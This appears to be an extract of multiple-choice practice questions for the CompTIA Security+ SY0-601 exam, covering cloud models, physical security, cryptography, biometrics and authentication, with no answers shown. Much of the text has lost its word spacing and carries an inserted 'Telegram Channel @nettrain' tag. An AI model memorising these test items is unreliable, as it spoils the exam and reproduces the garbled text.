C. RAID0
D. RAID1
56. Isabellaisresponsiblefordatabasemanagementandsecurity.Sheisattemptingtoremoveredundancyinthedatabase.Whatisthisprocesscalled?
A. Integritychecking
B. Deprovisioning
C. Baselining
D. Normalization
57. Gary wants to implement an AAA service. Which of the following services should he implement?
A. OpenID
B. LDAP
C. RADIUS
D. SAML
58. Where does TLS/SSL inspection happen, and how does it occur?
A. On the client, using a proxy
B. On the server, using a protocol analyzer
C. At the certificate authority, by validating a request for a TLS certificate
D. Between the client and server by intercepting encrypted communications
59. Diana wants to prevent drones from flying over her organization's property. What can she do?
A. Deploy automated drone take-down systems that will shoot the drones down.
B. Deploy radio frequency jamming systems to disrupt the drone's control frequencies.
C. Contact the FAA to get her company's property listed as a no-fly zone.
D. None of the above
60. Isaac has configured an infrastructure-as-code-based cloud environment that relies on code-defined system builds to spin up new systems as the services they run need to scale horizontally. An attacker discovers a vulnerability and exploits a system in the cluster, but it is shut down and terminated before they can perform a forensic analysis. What term describes this type of environment?
A. Forensic-resistant
B. Nonpersistent
C. Live-boot
D. Terminate and stay resident
61. You are responsible for database security at your company. You are concerned that programmers might pass badly written SQL commands to the database, or that an attacker might exploit badly written SQL in applications. What is the best way to mitigate this threat?
A. Formal code inspection
B. Programming policies
C. Agile programming
D. Stored procedures
62. Joanna's company has adopted multiple software-as-a-service (SaaS) tools and now wants to better coordinate them so that the data that they each contain can be used in multiple services. What type of solution should she recommend if she wants to minimize the complexity of long-term maintenance for her organization?
A. Replace the SaaS service with a platform-as-a-service (PaaS) environment to move everything to a single platform.
B. Build API-based integrations using in-house expertise.
C. Adopt an integration platform to leverage scalability.
D. Build flat-file integrations using in-house expertise.
63. Farès is responsible for managing the many virtual machines on his company's networks. Over the past two years, the company has increased the number of virtual machines significantly. Farès is no longer able to effectively manage the large number of machines. What is the term for this situation?
A. VM overload
B. VM sprawl
C. VM spread
D. VM zombies
64. Mary is responsible for virtualization management in her company. She is concerned about VM escape. Which of the following methods would be the most effective in mitigating this risk?
A. Only share resources between the VM and host if absolutely necessary.
B. Keep the VM patched.
C. Use a firewall on the VM.
D. Use host-based antimalware on the VM.
65. Irene wants to use a cloud service for her organization that does not require her to do any coding or system administration, and she wants to do minimal configuration to perform the tasks that her organization needs to accomplish. What type of cloud service is she most likely looking for?
A. SaaS
B. PaaS
C. IaaS
D. IDaaS
66. Which of the following is not an advantage of a serverless architecture?
A. It does not require a system administrator.
B. It can scale as function call frequency increases.
C. It can scale as function call frequency decreases.
D. It is ideal for complex applications.
67. You are responsible for server room security for your company. You are concerned about physical theft of the computers. Which of the following would be best able to detect theft or attempted theft?
A. Motion sensor–activated cameras
B. Smart card access to the server rooms
C. Strong deadbolt locks for the server rooms
D. Logging everyone who enters the server room
68. Alexandra wants to prevent systems that are infected with malware from connecting to a botnet controller that she knows the hostnames for. What type of solution can she implement to prevent the systems from reaching the controller?
A. An IDS
B. A round-robin DNS
C. A DNS sinkhole
D. A WAF
69. Hector is using infrared cameras to verify that servers in his datacenter are being properly racked. Which of the following datacenter elements is he concerned about?
A. EMI blocking
B. Humidity control
C. Hot and cold aisles
D. UPS failover
70. Gerald is concerned about unauthorized people entering the company's building. Which of the following would be most effective in preventing this?
A. Alarm systems
B. Fencing
C. Cameras
D. Security guards
71. Which of the following is the most important benefit from implementing SDN?
A. It will stop malware.
B. It provides scalability.
C. It will detect intrusions.
D. It will prevent session hijacking.
72. Mark is an administrator for a healthcare company. He has to support an older, legacy application. He is concerned that this legacy application might have vulnerabilities that would affect the rest of the network. What is the most efficient way to mitigate this?
A. Use an application container.
B. Implement SDN.
C. Run the application on a separate VLAN.
D. Insist on an updated version of the application.
73. Charles is performing a security review of an internally developed web application. During his review, he notes that the developers who wrote the application have made use of third-party libraries. What risks should he note as part of his review?
A. Code compiled with vulnerable third-party libraries will need to be recompiled with patched libraries.
B. Libraries used via code repositories could become unavailable, breaking the application.
C. Malicious code could be added without the developers knowing it.
D. All of the above
74. Valerie is considering deploying a cloud access security broker. What sort of tool is she looking at?
A. A system that implements mandatory access control on cloud infrastructure
B. A tool that sits between cloud users and applications to monitor activity and enforce policies
C. A tool that sits between cloud application providers and customers to enforce web application security policies
D. A system that implements discretionary access control on cloud infrastructure
75. Derek has been asked to implement his organization's service-oriented architecture as a set of microservices. What does he need to implement?
A. A set of loosely coupled services with specific purposes
B. A set of services that run on very small systems
C. A set of tightly coupled services with custom-designed protocols to ensure continuous operation
D. A set of services using third-party applications in a connected network enabled with industry standard protocols
76. Abigail is responsible for datacenters in a large, multinational company. She has to support multiple datacenters in diverse geographic regions. What would be the most effective way for her to manage these centers consistently across the enterprise?
A. Hire datacenter managers for each center.
B. Implement enterprise-wide SDN.
C. Implement infrastructure as code (IaC).
D. Automate provisioning and deprovisioning.
77. Elizabeth wants to implement a cloud-based authorization system. Which of the following protocols is she most likely to use for that purpose?
A. OpenID
B. Kerberos
C. SAML
D. OAuth
78. Greg is assessing an organization and finds that they have numerous multifunction printers (MFPs) that are accessible from the public Internet. What is the most critical security issue he should identify?
A. Third parties could print to the printers, using up the supplies.
B. The printers could be used as part of a DDoS attack.
C. The printers may allow attackers to access other parts of the company network.
D. The scanners may be accessed to allow attackers to scan documents that are left in them.
79. Keith has deployed computers to users in his company that load their resources from a central server environment rather than from their own hard drives. What term describes this model?
A. Thick clients
B. Client-as-a-server
C. Cloud desktops
D. Thin clients
80. Henry notices that a malware sample he is analyzing downloads a file from imgur.com and then executes an attack using Mimikatz, a powerful Windows password and account theft tool. When he analyzes the image, he cannot identify any recognizable code. What technique has most likely been used in this scenario?
A. The image is used as a decryption key.
B. The code is hidden in the image using steganography.
C. The code is encoded as text in the image.
D. The image is a control command from a malware command and control network.
81. Molly wants to advise her organization's developers on secure coding techniques to avoid data exposure. Which of the following is not a common technique used to prevent sensitive data exposure?
A. Store data in plain text.
B. Require HTTPS for all authenticated pages.
C. Ensure tokens are not disclosed in public source code.
D. Hash passwords using a salt.
82. Naomi wants to secure a real-time operating system (RTOS). Which of the following techniques is best suited to providing RTOS security?
A. Disable the web browser.
B. Install a host firewall.
C. Use secure firmware.
D. Install antimalware software.
83. John is examining the logs for his company's web applications. He discovers what he believes is a breach. After further investigation, it appears as if the attacker executed code from one of the libraries the application uses, code that is no longer even used by the application. What best describes this attack?
A. Buffer overflow
B. Code reuse attack
C. DoS attack
D. Session hijacking
84. Chris is designing an embedded system that needs to provide low-power, peer-to-peer communications. Which of the following technologies is best suited to this purpose?
A. Baseband radio
B. Narrowband radio
C. Zigbee
D. Cellular
85. What term is used to describe encryption that can permit computations to be conducted on ciphertext, with the results matching what would have occurred if the same computations were performed on the original plaintext?
A. Identity-preserving encryption
B. Homomorphic encryption
C. Replicable encryption
D. None of the above
86. Tony wants to implement a biometric system for entry access in his organization. Which of the following systems is likely to be most accepted by members of his organization's staff?
A. Fingerprint
B. Retina
C. Iris
D. Voice
87. Nathan wants to implement off-site cold backups. What backup technology is most commonly used for this type of need?
A. SAN
B. Disk
C. Tape
D. NAS
88. Allan is considering implementing off-site storage. When he does, his datacenter manager offers four solutions. Which of these solutions will best ensure resilience and why?
A. Back up to a second datacenter in another building nearby, allowing reduced latency for backups.
B. Back up to an off-site location at least 90 miles away to ensure that a natural disaster does not destroy both copies.
C. Back up to a second datacenter in another building nearby to ensure that the data will be accessible if the power fails to the primary building.
D. Back up to an off-site location at least 10 miles away to balance latency and resilience due to natural disaster.
89. Ben has been asked to explain the security implications for an embedded system that his organization is considering building and selling. Which of the following is not a typical concern for embedded systems?
A. Limited processor power
B. An inability to patch
C. Lack of authentication capabilities
D. Lack of bulk storage
90. You are concerned about the security of new devices your company has implemented. Some of these devices use SoC technology. What would be the best security measure you could take for these?
A. Using a TPM
B. Ensuring each has its own cryptographic key
C. Using SED
D. Using BIOS protection
91. Vincent works for a company that manufactures portable medical devices, such as insulin pumps. He is concerned about ensuring these devices are secure. Which of the following is the most important step for him to take?
A. Ensure all communications with the device are encrypted.
B. Ensure the devices have FDE.
C. Ensure the devices have individual antimalware.
D. Ensure the devices have been fuzz-tested.
92. Emile is concerned about securing the computer systems in vehicles. Which of the following vehicle types has significant cybersecurity vulnerabilities?
A. UAV
B. Automobiles
C. Airplanes
D. All of the above
93. What additional security control can Amanda implement if she uses compiled software that she cannot use if she only has software binaries?
A. She can review the source code.
B. She can test the application in a live environment.
C. She can check the checksums provided by the vendor.
D. None of the above
94. Greta wants to understand how a protocol works, including what values should be included in packets that use that protocol. Where is this data definitively defined and documented?
A. An RFC
B. Wikipedia
C. The Internet Archive
D. None of the above
95. Using standard naming conventions provides a number of advantages. Which of the following is not an advantage of using a naming convention?
A. It can help administrators determine the function of a system.
B. It can help administrators identify misconfigured or rogue systems.
C. It can help conceal systems from attackers.
D. It can make scripting easier.
96. What process is shown in the following figure?
A. A continuous monitoring environment
B. A CI/CD pipeline
C. A static code analysis system
D. A malware analysis process
97. Keith wants to identify a subject from camera footage from a train station. What biometric technology is best suited to this type of identification?
A. Vein analysis
B. Voiceprint analysis
C. Fingerprint analysis
D. Gait analysis
98. Your company is interested in keeping data in the cloud. Management feels that public clouds are not secure but is concerned about the cost of a private cloud. What is the solution you would recommend?
A. Tell them there are no risks with public clouds.
B. Tell them they will have to find a way to budget for a private cloud.
C. Suggest that they consider a community cloud.
D. Recommend against a cloud solution at this time.
99. Your development team primarily uses Windows, but they need to develop a specific solution that will run on Linux. What is the best solution to get your programmers access to Linux systems for development and testing if you want to use a cloud solution where you could run the final systems in production as well?
A. Set their machines to dual-boot Windows and Linux.
B. Use PaaS.
C. Set up a few Linux machines for them to work with as needed.
D. Use IaaS.
100. Corrine has been asked to automate security responses, including blocking IP addresses from which attacks are detected using a series of scripts. What critical danger should she consider while building the scripts for her organization?
A. The scripts could cause an outage.
B. The scripts may not respond promptly to private IP addresses.
C. Attackers could use the scripts to attack the organization.
D. Auditors may not allow the scripts.
101. Madhuri has configured a backup that will back up all of the changes to a system since the last time that a full backup occurred. What type of backup has she set up?
A. A snapshot
B. A full backup
C. An incremental backup
D. A differential
102. You are the CIO for a small company. The company wants to use cloud storage for some of its data, but cost is a major concern. Which of the following cloud deployment models would be best?
A. Community cloud
B. Private cloud
C. Public cloud
D. Hybrid cloud
103. What is the point where false acceptance rate and false rejection rate cross over in a biometric system?
A. CRE
B. FRE
C. CER
D. FRR
104. Devin is building a cloud system and wants to ensure that it can adapt to changes in its workload by provisioning or deprovisioning resources automatically. His goal is to ensure that the environment is not overprovisioned or underprovisioned and that he is efficiently spending money on his infrastructure. What concept describes this?
A. Vertical scalability
B. Elasticity
C. Horizontal scalability
D. Normalization
105. Nathaniel wants to improve the fault tolerance of a server in his datacenter. If he wants to ensure that a power outage does not cause the server to lose power, what is the first control he should deploy from the following list?
A. A UPS
B. A generator
C. Dual power supplies
D. Managed power units (PDUs)
106. Which of the following is the best description for VM sprawl?
A. When VMs on your network outnumber physical machines
B. When there are more VMs than IT can effectively manage
C. When a VM on a computer begins to consume too many resources
D. When VMs are spread across a wide area network
107. Which of the following is the best description of a stored procedure?
A. Code that is in a DLL, rather than the executable
B. Server-side code that is called from a client
C. SQL statements compiled on the database server as a single procedure that can be called
D. Procedures that are kept on a separate server from the calling application, such as in middleware
108. Farès is responsible for security at his company. He has had bollards installed around the front of the building. What is Farès trying to accomplish?
A. Gated access for people entering the building
B. Video monitoring around the building
C. Protecting against EMI
D. Preventing a vehicle from being driven into the building
109. The large company that Selah works at uses badges with a magnetic stripe for entry access. Which threat model should Selah be concerned about with badges like these?
A. Cloning of badges
B. Tailgating
C. Use by unauthorized individuals
D. All of the above
110. You are concerned about VM escape attacks causing a significant data breach. Which of the following would provide the most protection against this?
A. Separate VM hosts by data type or sensitivity.
B. Install a host-based antivirus on both the VM and the host.
C. Implement FDE on both the VM and the host.
D. Use a TPM on the host.
111. Teresa is the network administrator for a small company. The company is interested in a robust and modern network defense strategy but lacks the staff to support it. What would be the best solution for Teresa to use?
A. Implement SDN.
B. Use automated security.
C. Use an MSSP.
D. Implement only the few security controls they have the skills to implement.
112. Dennis is trying to set up a system to analyze the integrity of applications on his network. He wants to make sure that the applications have not been tampered with or Trojaned. What would be most useful in accomplishing this goal?
A. Implement NIPS.
B. Use cryptographic hashes.
C. Sandbox the applications in question.
D. Implement NIDS.
113. George is a network administrator at a power plant. He notices that several turbines had unusual ramp-ups in cycles last week. After investigating, he finds that an executable was uploaded to the system control console and caused this. Which of the following would be most effective in preventing this from affecting the SCADA system in the future?
A. Implement SDN.
B. Improve patch management.
C. Place the SCADA system on a separate VLAN.
D. Implement encrypted data transmissions.
114. Gordon knows that regression testing is important but wants to prevent old versions of code from being re-inserted into new releases. What process should he use to prevent this?
A. Continuous integration
B. Version numbering
C. Continuous deployment
D. Release management
115. Mia is a network administrator for a bank. She is responsible for secure communications with her company's customer website. Which of the following would be the best for her to implement?
A. SSL
B. PPTP
C. IPSec
D. TLS
116. Which of the following is not a common challenge with smartcard-based authentication systems?
A. Weak security due to the limitations of the smartcard's encryption support
B. Added expense due to card readers, distribution, and software installation
C. Weaker user experience due to the requirement to insert the card for every authentication
D. Lack of security due to possession of the card being the only factor used
117. Susan's secure building is equipped with alarms that go off if specific doors are opened. As part of a penetration test, Susan wants to determine if the alarms are effective. What technique is used by penetration testers to make alarms less effective?
A. Setting off the alarms as part of a preannounced test
B. Disabling the alarms and then opening doors to see if staff report the opened doors
C. Asking staff members to open the doors to see if they will set the alarm off
D. Setting off the alarms repeatedly so that staff become used to hearing them go off
118. What term is used to describe the general concept of "anything as a service"?
A. AaaS
B. ATaaS
C. XaaS
D. ZaaS
119. What role does signage play in building security?
A. It is a preventive control warning unauthorized individuals away from secured areas.
B. It can help with safety by warning about dangerous areas, materials, or equipment.
C. It can provide directions for evacuation and general navigation.
D. All of the above
120. Nora has rented a building with access to bandwidth and power in case her organization ever experiences a disaster. What type of site has she established?
A. A hot site
B. A cold site
C. A warm site
D. A MOU site
121. Matt is patching a Windows system and wants to have the ability to revert to a last known good configuration. What should he set?
A. A system restore point
B. A reversion marker
C. A nonpersistent patch point
D. A live boot marker
122. Which multifactor authentication can suffer from problems if the system or device's time is not correct?
A. TOTP
B. SMS
C. HOTP
D. MMAC
123. The company that Nina works for has suffered from recent thefts of packages from a low-security delivery area. What type of camera capability can they use to ensure that a recently delivered package is properly monitored?
A. Infrared image capture
B. Motion detection
C. Object detection
D. Facial recognition
124. Which of the following is not a common organizational security concern for wearable devices?
A. GPS location data exposure
B. Data exposure
C. User health data exposure
D. Insecure wireless connectivity
125. Tim is building a Faraday cage around his server room. What is the primary purpose of a Faraday cage?
A. To regulate temperature
B. To regulate current
C. To block intrusions
D. To block EMI
126. You are working for a large company. You are trying to find a solution that will provide controlled physical access to the building and record every employee who enters the building. Which of the following would be the best for you to implement?
A. A security guard with a sign-in sheet
B. Smart card access using electronic locks
C. A camera by the entrance
D. A sign-in sheet by the front door
127. What concern causes organizations to choose physical locks over electronic locks?
A. They provide greater security.
B. They are resistant to bypass attempts.
C. They are harder to pick.
D. They do not require power.
128. Kara has been asked to include IP schema management as part of her configuration management efforts. Which of the following is a security advantage of IP schema configuration management?
A. Detecting rogue devices
B. Using IP addresses to secure encryption keys
C. Preventing denial-of-service attacks
D. Avoiding IP address exhaustion
129. Carole is concerned about security for her server room. She wants the most secure lock she can find for the server room door. Which of the following would be the best choice for her?
A. Combination lock
B. Key-in-knob
C. Deadbolt
D. Padlock
130. Melissa wants to implement NIC teaming for a server in her datacenter. What two major capabilities will this provide for her?
A. Lower latency and greater throughput
B. Greater throughput and fault tolerance
C. Higher latency and fault tolerance
D. Fault tolerance and lower latency
131. Molly is implementing biometrics in her company. Which of the following should be her biggest concern?
A. FAR
B. FRR
C. CER
D. EER
132. Mike is concerned about data sovereignty for data that his organization captures and maintains. What best describes his concern?
A. Who owns the data that is captured on systems hosted in a cloud provider's infrastructure?
B. Can Mike's organization make decisions about data that is part of its service, or does it belong to users?
C. Is the data located in a country subject to the laws of the country where it is stored?
D. Does data have rights on its own, or does the owner of the data determine what rights may apply to it?
133. What are the key limiting factors for cryptography on low-power devices?
A. There are system limitations on memory, CPU, and storage.
B. The devices cannot support public key encryption due to an inability to factor prime numbers.
C. There is a lack of chipset support for encryption.
D. Legal limitations for low-power devices prevent encryption from being supported.
134. Fred is responsible for physical security in his company. He wants to find a good way to protect the USB thumb drives that have BitLocker keys stored on them. Which of the following would be the best solution for this situation?
A. Store the drives in a secure cabinet or safe.
B. Encrypt the thumb drives.
C. Don't store BitLocker keys on these drives.
D. Lock the thumb drives in desk drawers.
135. Juanita is responsible for servers in her company. She is looking for a fault-tolerant solution that can handle two drives failing. Which of the following should she select?
A. RAID 3
B. RAID 0
C. RAID 5
D. RAID 6
136. Maria's organization uses a CCTV monitoring system in their main office building, which is occupied and in use 24-7. The system uses cameras connected to displays to provide real-time monitoring. What additional feature is the most likely to receive requests to ensure that her organization can effectively use the CCTV system to respond to theft and other issues?
A. Motion activation
B. Infrared cameras
C. DVR
D. Facial recognition
137. What is the primary threat model against static codes used for multifactor authentication?
A. Brute force
B. Collisions
C. Theft
D. Clock mismatch
138. Dennis needs a cryptographic algorithm that provides low latency. What type of cryptosystem is most likely to meet this performance requirement?
A. Hashing
B. Symmetric encryption
C. Asymmetric encryption
D. Electronic one-time pad
139. The company that Devin works for has selected a nondescript building and does not use exterior signage to advertise that the facility belongs to them. What physical security term describes this type of security control?
A. Industrial camouflage
B. Demilitarized zone
C. Industrial obfuscation
D. Disruptive coloration
140. Ed knows that TLS sessions start using asymmetric encryption, and then move to use symmetric keys. What limitation of asymmetric cryptography drives this design decision?
A. Speed and computational overhead
B. Key length limitations
C. Lifespan (time) to brute force it
D. Key reuse for asymmetric algorithms
141. When you are concerned about application security, what is the most important issue in memory management?
A. Never allocate a variable any larger than is needed.
B. Always check bounds on arrays.
C. Always declare a variable where you need it (i.e., at function or file level if possible).
D. Make sure you release any memory you allocate.
142. Bart wants to ensure that the file he encrypts remains secure for as long as possible. What should Bart do to maximize the longevity of his encrypted file's security?
A. Use a quantum cipher.
B. Use the longest key possible.
C. Use an anti-quantum cipher.
D. Use a rotating symmetric key.
143. Nadine's organization stores and uses sensitive information, including Social Security numbers. After a recent compromise, she has been asked to implement technology that can help prevent this sensitive data from leaving the company's systems and networks. What type of technology should Nadine implement?
A. Stateful firewalls
B. OEM
C. DLP
D. SIEM
144. What form is the data used for quantum key distribution sent in?
A. Bytes
B. Bits
C. Qubits
D. Nuquants
145. Alicia needs to ensure that a process cannot be subverted by a single employee. What security control can she implement to prevent this?
A. Biometric authentication
B. Two-person control
C. Robotic sentries
D. A DMZ
146. Social login, the ability to use an existing identity from a site like Google, Facebook, or a Microsoft account, is an example of which of the following concepts?
A. Federation
B. AAA
C. Privilege creep
D. Identity and access management
147. Michelle is traveling and wants to plug her phone into the charger in her hotel room. What security precaution can she use to ensure that her phone is not attacked by a malicious device built into the charger in her room?
A. A USB data blocker
B. A parallel USB cable
C. A data circuit breaker
D. An HOTP interrogator
148. Which cloud service model provides the consumer with the infrastructure to create applications and host them?
A. SaaS
B. PaaS
C. IaaS
D. IDaaS
149. Why is avoiding initialization vector and key reuse recommended to ensure secure encryption?
A. It makes it impossible to brute force.
B. It means a single successful attack will not expose multiple messages.
C. It means a single successful attack will not expose any messages.
D. It makes brute force easier.
150. Dan knows that his Linux system generates entropy that is used for multiple functions, including encryption. Which of the following is a source of entropy for the Linux kernel?
A. Time of day
B. User login events
C. Keystrokes and mouse movement
D. Network packet timing
151. Mike knows that computational overheads are a concern for cryptographic systems. What can he do to help limit the computational needs of his solution?
A. Use hashes instead.
B. Use short keys.
C. Use elliptic curve encryption.
D. Use the RSA algorithm.
152. What is the primary role of lighting in a physical security environment?
A. It acts as a detective control.
B. It acts as a reactive control.
C. It acts as a deterrent control.
D. It acts as a compensating control.
153. Dennis has deployed servers and storage to each of the facilities his organization runs to ensure that scientific equipment can send and receive data at the speed that it needs to function. What computational design concept describes this?
A. Hybrid cloud
B. Mist computing
C. Edge computing
D. Local cloud
154. Ben replaces sensitive data in his database with unique identifiers. The identifiers allow him to continue to take actions on the data without exposing the data itself. What type of solution has he deployed?
A. Masking
B. Encryption
C. Hashing
D. Tokenization
155. Dana wants to discourage potential malicious actors from accessing her facility. Which of the following is both a deterrent and a physical control?
A. A visitor log
B. A motion detector
C. A security camera
D. Fences
156. What additional capabilities does adding a digital signature to an encrypted message provide?
A. Integrity and nonrepudiation
B. Confidentiality and integrity
C. Availability and nonrepudiation
D. Confidentiality and availability
157. Megan has been asked to set up a periodic attestation process for accounts in her organization. What has she been asked to do?
A. Validate that the users are still employed.
B. Validate that the user's rights and permissions are still correct.
C. Require users to provide proof of identity.
D. Validate security controls as part of a test.
158. Elaine wants to adopt appropriate response and recovery controls for natural disasters. What type of control should she use to prepare for a multihour power outage caused by a tornado?
A. A hot site
B. A generator
C. A PDU
D. A UPS
159. What does a message authentication code (MAC) do when used as part of a cryptographic system?
A. It validates the message's integrity and authenticity.
B. It validates the message's confidentiality and authenticity.
C. It protects the message's confidentiality and integrity.
D. None of the above
160. Charles wants to put a fire suppression system in place in an area where highly sensitive electronics are in use. What type of fire suppression system is best suited to this type of environment if Charles is concerned about potential harm to first responders or on-site staff?
A. Pre-charge
B. Dry pipe
C. Inert gas
D. Carbon dioxide
161. What technology is typically used for proximity card readers?
A. Magnetic stripe
B. Biometrics
C. RFID
D. Infrared
162. How does asymmetric encryption support nonrepudiation?
A. Using digital signatures
B. Using longer keys
C. Using reversible hashes
D. Using the recipient's public key
163. Olivia knows that she needs to consider geography as part of her security considerations. Which of the following is a primary driver of geographical considerations for security?
A. MTR
B. Natural disasters
C. Service integration
D. Sprawl avoidance
164. Scott wants to limit the impact of potential threats from UAVs. What physical security control is best suited to this purpose?
A. Adding more fences
B. Moving sensitive areas to the interior of a building
C. Deploying biometric sensors
D. Moving sensitive areas to Faraday cages
165. Derek wants to explain the concept of resource constraints driving security constraints when using encryption. Which of the following descriptions best explains the trade-offs that he should explain to his management?
A. Stronger encryption requires more space on drives, meaning that the harder it is to break, the more storage you'll need, driving up cost.
B. Stronger encryption is faster, which means that using strong encryption will result in lower latency.
C. Stronger encryption requires more entropy. This may reduce the overall security of the system when entropy is exhausted.
D. Stronger encryption requires more computational resources, requiring a balance between speed and security.
166. Amanda wants to ensure that the message she is sending remains confidential. What should she do to ensure this?
A. Hash the messages.
B. Digitally sign the message.
C. Encrypt the message.
D. Use a quantum encryption algorithm.
167. What security advantage do cloud service providers like Amazon, Google, and Microsoft have over local staff and systems for most small to mid-sized organizations?
A. Better understanding of the organization's business practices
B. Faster response times
C. More security staff and budget
D. None of the above
168. Tim wants to ensure that his web servers can scale horizontally during traffic increases, while also allowing them to be patched or upgraded without causing outages. What type of network device should he deploy?
A. A firewall
B. A switch
C. A horizontal scaler
D. A network load balancer
169. Gabby wants to ensure that sensitive data can be transmitted in unencrypted form by using physical safeguards. What type of solution should she implement?
A. Shielded cables
B. Armored cables
C. Distribution lockdown
D. Protected cable distribution
170. Maureen conceals information she wants to transmit surreptitiously by modifying an MP3 file in a way that does not noticeably change how it sounds. What is this technique called?
A. MP3crypt
B. Audio steganography
C. Audio hashing
D. Honey MP3s
171. Nicole is assessing risks to her multifactor authentication system. Which of the following is the most likely threat model against short message service (SMS) push notifications to cell phones for her environment?
A. Attacks on VoIP systems
B. SIM cloning
C. Brute-force attacks
D. Rainbow tables
172. John wants to protect data at rest so that he can process it and use it as needed in its original form. What solution from the following list is best suited to this requirement?
A. Hashing
B. TLS
C. Encryption
D. Tokenization
173. Nathaniel has deployed the control infrastructure for his manufacturing plant without a network connection to his other networks. What term describes this type of configuration?
A. DMZ
B. Air gap
C. Vaulting
D. A hot aisle
174. Naomi hides the original data in a Social Security number field to ensure that it is not exposed to users of her database. What data security technique does this describe?
A. Masking
B. Encryption
C. Hashing
D. Tokenization
175. Isaac wants to use on-premises cloud computing. What term describes this type of cloud computing solution?
A. Infrastructure as a service
B. Hybrid cloud
C. Private cloud
D. Platform as a service
176. What is the primary threat model against physical tokens used for multifactor authentication?
A. Cloning
B. Brute force
C. Theft
D. Algorithm failure
177. Maria is a security administrator for a large bank. She is concerned about malware, particularly spyware that could compromise customer data. Which of the following would be the best approach for her to mitigate the threat of spyware?
A. Computer usage policies, network antimalware, and host antimalware
B. Host antimalware and network antimalware
C. Host and network antimalware, computer usage policies, and website whitelisting
D. Host and network antimalware, computer usage policies, and employee training
178. Charles has configured his multifactor system to require both a PIN and a password. How many effective factors does he have in place once he presents both of these and his username?
A. One
B. Two
C. Three
D. Four
179. Fred adds the value 89EA443CCDA16B89 to every password as a salt. What issue might this cause?
A. The salt is too long.
B. The salt is alphanumeric.
C. The salt is reused.
D. The salt is too short.
180. Alaina needs to physically secure the root encryption keys for a certificate authority. What type of security device should she use to maintain local control and security for them?
A. A USB thumb drive
B. A vault or safe
C. An air-gapped system
D. None of the above
181. Angela wants to help her organization use APIs more securely and needs to select three API security best practices. Which of the following options is not a common API security best practice?
A. Use encryption throughout the API's request/response cycle.
B. Authorize before authenticating.
C. Do not trust input strings and validate parameters.
D. Enable auditing and logging.
182. Frank uses a powerful magnet to wipe tapes before they are removed from his organization's inventory. What type of secure data destruction technique has he used?
A. Tape burning
B. Data shredding
C. Degaussing
D. Pulping
183. Angela has been asked to deploy 5G cellular inside her organization. What concern should she raise with her management about the effort to implement it?
A. 5G requires high levels of antenna density for full coverage.
B. 5G signals should only be used in exterior deployments.
C. 5G is not widely available and cannot be deployed yet.
D. 5G signals cannot coexist with traditional Wi-Fi.
184. Chris is reviewing the rights that staff in his organization have to data stored in a group of departmental file shares. He is concerned that rights management practices have not been followed and that employees who have been with the company he works for have not had their privileges removed after they switched jobs. What type of issue has Chris encountered?
A. Privilege creep
B. IAM inflation
C. Masking issues
D. Privilege escalation
185. Isaac has been asked to set up a honeyfile. What should he configure?
A. A list of tasks to accomplish
B. A list of potentially valuable data
C. A bait file for attackers to access
D. A vulnerable Word file
186. Yasmine wants to ensure that she has met a geographic dispersal requirement for her datacenters. How far away should she place her datacenter based on common best practices for dispersal?
A. 5 miles
B. 45 miles
C. 90 miles
D. 150 miles
187. What term describes extending cloud computing to the edge of an enterprise network?
A. Local cloud
B. Fog computing
C. Managed cloud
D. Blade computing
188. Which of the following algorithms is a key stretching algorithm?
A. bcrypt
B. ncrypt
C. MD5
D. SHA1
189. Jocelyn has been asked to implement a directory service. Which of the following technologies should she deploy?
A. SAML
B. OAuth
C. LDAP
D. 802.1x

Chapter 3: Implementation
THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:
3.1 Given a scenario, implement secure protocols
3.2 Given a scenario, implement host or application security solutions
3.3 Givenascenario,implementsecurenetworkdesigns
3.4 Givenascenario,installandconfigurewirelesssecuritysettings
3.5 Givenascenario,implementsecuremobilesolutions
3.6 Givenascenarioapplycybersecuritysolutionstothecloud
3.7 Givenascenario,implementidentityandaccountmanagementcontrols
3.8 Givenascenario,implementauthenticationandauthorizationsolutions
3.9 Givenascenario,implementpublickeyinfrastructure
1. Adamissettingupapublickeyinfrastructure(PKI)andknowsthatkeepingthepassphrasesandencryptionkeysusedtogeneratenewkeysisacriticalpartofhowtoensurethattherootcertificateauthorityremainssecure.Whichofthefollowingtechniquesisnotacommonsolutiontohelppreventinsiderthreats?
A. Requireanewpassphraseeverytimethecertificateisused.
B. Useasplitknowledgeprocessforthepasswordorkey.
C. Requiredualcontrol.
D. Implementseparationofduties.
2. Naomiisdesigningherorganization'swirelessnetworkandwantstoensure
Telegram Channel @nettrain
thatthedesignplacesaccesspointsinareaswheretheywillprovideoptimumcoverage.ShealsowantstoplanforanysourcesofRFinterferenceaspartofherdesign.WhatshouldNaomidofirst?
A. ContacttheFCCforawirelessmap.
B. Conductasitesurvey.
C. Disableallexistingaccesspoints.
D. Conductaportscantofindallexistingaccesspoints.
3. Chrisispreparingtoimplementan802.1X-enabledwirelessinfrastructure.HeknowsthathewantstouseanExtensibleAuthenticationProtocol(EAP)-basedprotocolthatdoesnotrequireclient-sidecertificates.Whichofthefollowingoptionsshouldhechoose?
A. EAP-MD5
B. PEAP
C. LEAP
D. EAP-TLS
4. Whattermiscommonlyusedtodescribelateraltrafficmovementwithinanetwork?
A. Side-stepping
B. Slidertraffic
C. East-westtraffic
D. Peerinterconnect
5. CharlenewantstousethesecurityfeaturesbuiltintoHTTPheaders.WhichofthefollowingisnotanHTTPheadersecurityoption?
A. Requiringtransportsecurity
B. Preventingcross-sitescripting
C. DisablingSQLinjection
D. HelpingpreventMIMEsniffing
6. Charlenewantstoprovisionherorganization'sstandardsetofmarketinginformationtomobiledevicesthroughoutherorganization.WhatMDMfeatureisbestsuitedtothistask?
Telegram Channel @nettrain
A. Applicationmanagement
B. Remotewipe
C. Contentmanagement
D. Pushnotifications
7. Dennywantstodeployantivirusforhisorganizationandwantstoensurethatitwillstopthemostmalware.WhatdeploymentmodelshouldDennyselect?
A. InstallantivirusfromthesamevendoronindividualPCsandserverstobestbalancevisibility,support,andsecurity.
B. InstallantivirusfrommorethanonevendoronallPCsandserverstomaximizecoverage.
C. InstallantivirusfromonevendoronPCsandfromanothervendorontheservertoprovideagreaterchanceofcatchingmalware.
D. Installantivirusonlyonworkstationstoavoidpotentialissueswithserverperformance.
8. WhenAmandavisitsherlocalcoffeeshop,shecanconnecttotheopenwirelesswithoutprovidingapasswordorloggingin,butsheisimmediatelyredirectedtoawebsitethatasksforheremailaddress.Oncesheprovidesit,sheisabletobrowsetheInternetnormally.WhattypeoftechnologyhasAmandaencountered?
A. Apresharedkey
B. Acaptiveportal
C. Portsecurity
D. AWi-Fiprotectedaccess
